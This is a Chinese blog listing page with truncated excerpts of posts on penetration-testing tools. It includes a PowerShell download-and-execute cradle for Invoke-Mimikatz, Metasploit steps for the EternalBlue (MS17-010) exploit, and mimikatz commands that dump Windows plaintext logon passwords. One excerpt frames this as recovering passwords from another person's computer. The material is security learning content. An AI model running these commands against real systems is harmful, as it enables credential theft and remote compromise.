(1)Invoke-Mimikatz.ps1下载地址https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1(2)具备网络环境直接执行命令powershell "IEX (New-Object Net.WebClient).DownloadStr
分类:
其他好文 时间:
2018-06-07 20:09:18
阅读次数:
447
nmap -sV -Pn xxxxx 扫描端口and系统信息 use auxiliary/scanner/smb/smb_ms17_010 扫描模块 set Rhosts 扫描目标 use exploit/windows/smb/ms17_010_eternalblue 攻击模块 需要设置目标ip ...
分类:
其他好文 时间:
2018-04-26 01:30:49
阅读次数:
243
漏洞利用之检索与利用 searchsploit 会通过本地的 Exploit DB查找漏洞信息。需要注意的是,searchsploit 使用 AND 运算符,使用的术语越多,滤除的结果越多。 漏洞利用之Metasploit基础 1.启动服务: 在kali中使用metasploit,需要先使用命令 开 ...
分类:
其他好文 时间:
2018-04-22 20:13:29
阅读次数:
257
获取 Windows 明文用户名密码 git clone https://github.com/gentilkiwi/mimikatz.git load mimikatz privilege::debug sekurlsa::logonPasswords full Python shell pyth ...
分类:
其他好文 时间:
2018-04-14 00:40:52
阅读次数:
394
1、前言 mimikatz框架是非常精妙的,粗浅讲一下修改的思路。 它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块 mimikatz.c 部分代码: 实际调用模块的方式 如果要添加各种变量作为功能模块。在打开解决方案后,global files目录中的globals.h文件可 ...
分类:
其他好文 时间:
2018-02-16 14:47:00
阅读次数:
1895
web安全资料https://github.com/CHYbeta/Web-Security-Learning Mimikatz 非官方指南和命令参考_Part1 http://www.anquan.us/static/drops/tools-12462.html Mimikatz 非官方指南和命令 ...
分类:
其他好文 时间:
2018-01-21 22:40:47
阅读次数:
200
调试这个工具的时候,发现新版本没生成debug模式的选项,F11调试没有对应到源代码。仔细一看原来是没有生成调试文件。 设置一下,让Release的程序也生成pdb文件,就好了。 ...
分类:
数据库 时间:
2018-01-20 19:51:25
阅读次数:
223
<!-- -->mimikatz,很出名的查看Window本地账户密码(经测试,不支持探测Window在线账户认证密码的探测) github: https://github.com/gentilkiwi/mimikatz 官方: http://blog.gentilkiwi.com/mimikatz ...
法一: https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170813 法二: powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githu ...
分类:
其他好文 时间:
2017-08-19 12:54:45
阅读次数:
171
电脑密码忘记了可以用本工具找回,前提是你能进入系统,例如本机保存了远程服务器登录的密码或借别人的电脑,而忘记了密码;mimikatz 2.0工具正好解决了你的问题。 ...
